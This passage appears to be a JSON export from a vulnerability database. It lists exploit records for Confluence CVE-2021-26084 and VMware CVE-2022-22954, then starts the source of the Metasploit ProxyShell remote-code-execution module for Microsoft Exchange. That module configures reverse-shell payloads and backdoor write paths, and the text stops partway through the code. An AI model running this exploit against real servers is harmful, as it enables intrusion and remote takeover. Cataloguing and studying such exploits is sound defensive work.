"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:55:53", "description": "<h1 align=\"right\">\n <br>\n <a href=\"https://github.com/smadi0x8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-03-21T07:43:04", "id": "CC614155-FD7D-599B-B89C-006B26D76F48", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:20:19", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "69FAE88E-7F22-5ACC-B555-3441BE00C566", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-18T22:15:58", "description": "# CVE-2022-22954-POC\nVMware Workspace ONE Access\uff08\u4ee5\u524d\u79f0\u4e3aVMware Iden...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T02:24:22", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-04-16T16:17:13", "id": "C510D823-26C6-5BF9-B30F-5CDF456F72A6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-09-27T23:28:23", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T01:44:07", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-09-27T23:19:10", "id": "76BEF355-6500-5375-ABB3-A0557EB1CDD8", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:58:57", "description": "# VMware-CVE-2022-22954\n\n# VMware CVE-2022-22954 Workspace ONE A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T06:35:10", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-08-15T15:42:19", "id": "CB8E07F4-50D7-541D-8B3E-749FACA903E3", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:40:26", "description": "## CVE-2022-22954 PoC\nVMware Workspace ONE Access and Identity M...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T08:51:44", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-10-11T16:56:41", "id": "0D5F53B0-63C3-52D0-960A-09382DCD6A64", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:59:30", "description": "# CVE-2022-22954\n\n## Attention\n> Please use this at your own ris...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T23:21:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Identity Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2023-09-28T11:37:52", "id": "49594F88-14A4-5CA9-9202-ABE72435019C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:25:08", "description": "# CVE-2021-26084\nCVE-2021-26084 - Confluence Pre-Auth RCE | O...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T16:33:32", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-13T21:41:32", "id": "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:01", "description": "# CVE-2021-26084\nCVE-2021-26084 Confluence OGNL injection\n\n![\u56fe\u7247]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-03T07:41:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-27T09:00:16", "id": "B16D26DB-D60C-5C0C-9452-80112720B442", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:38:38", "description": "# CVE-2021-26084\nConfluence aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T11:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T04:53:46", "id": "EF37F62F-1579-535A-9C3E-49B080F41CAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T17:18:23", "description": "<h1 align=\"right\">\n <br>\n <a href=\"https://github.com/smadi0x8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-03-21T07:43:04", "id": "5C66B0C2-B7C3-5BF1-AE5C-846940E188A6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:19:55", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "F5B504D7-7C37-5BAB-94A5-1F1DA8384055", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T21:20:05", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-11-30T09:57:00", "id": "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "packetstorm": [{"lastseen": "2021-08-20T15:47:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange ProxyShell Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "PACKETSTORM:163895", "href": "https://packetstormsecurity.com/files/163895/Microsoft-Exchange-ProxyShell-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'winrm' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Microsoft Exchange ProxyShell RCE', \n'Description' => %q{ \nThis module exploit a vulnerability on Microsoft Exchange Server that \nallows an attacker to bypass the authentication (CVE-2021-31207), impersonate an \narbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve \nthe RCE (Remote Code Execution). \n \nBy taking advantage of this vulnerability, you can execute arbitrary \ncommands on the remote Microsoft Exchange Server. \n \nThis vulnerability affects Exchange 2013 CU23 < 15.0.1497.15, \nExchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5, \nExchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9. \n \nAll components are vulnerable by default. \n}, \n'Author' => [ \n'Orange Tsai', # Discovery \n'Jang (@testanull)', # Vulnerability analysis \n'PeterJson', # Vulnerability analysis \n'brandonshi123', # Vulnerability analysis \n'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template \n'Spencer McIntyre', # Metasploit module \n'wvu' # Testing \n], \n'References' => [ \n[ 'CVE', '2021-34473' ], \n[ 'CVE', '2021-34523' ], \n[ 'CVE', '2021-31207' ], \n[ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ], \n[ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ], \n[ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ] \n], \n'DisclosureDate' => '2021-04-06', # pwn2own 2021 \n'License' => MSF_LICENSE, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Platform' => ['windows'], \n'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Windows Powershell', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_powershell, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_X64, ARCH_X86], \n'Type' => :windows_dropper, \n'CmdStagerFlavor' => %i[psh_invokewebrequest], \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest' \n} \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'windows', \n'Arch' => [ARCH_CMD], \n'Type' => :windows_command, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS], \n'AKA' => ['ProxyShell'], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \n \nregister_options([ \nOptString.new('EMAIL', [true, 'A known email address for this organization']), \nOptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]), \n]) \n \nregister_advanced_options([ \nOptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']), \nOptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']), \nOptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']), \nOptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']), \nOptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']), \nOptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']), \nOptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0']) \n]) \nend \n \ndef check \n@ssrf_email ||= Faker::Internet.email \nres = send_http('GET', '/mapi/nspi/') \nreturn CheckCode::Unknown if res.nil? \nreturn CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint' \n \nCheckCode::Vulnerable \nend \n \ndef cmd_windows_generic? \ndatastore['PAYLOAD'] == 'cmd/windows/generic' \nend \n \ndef encode_cmd(cmd) \ncmd.gsub!('\\\\', '\\\\\\\\\\\\') \ncmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b') \nend \n \ndef random_mapi_id \nid = \"{#{Rex::Text.rand_text_hex(8)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(4)}\" \nid = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\" \nid.upcase \nend \n \ndef request_autodiscover(_server_name) \nxmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' } \n \nresponse = send_http( \n'POST', \n'/autodiscover/autodiscover.xml', \ndata: soap_autodiscover, \nctype: 'text/xml; charset=utf-8' \n) \n \ncase response.body \nwhen %r{<ErrorCode>500</ErrorCode>} \nfail_with(Failure::NotFound, 'No Autodiscover information was found') \nwhen %r{<Action>redirectAddr</Action>} \nfail_with(Failure::NotFound, 'No email address was found') \nend \n \nxml = 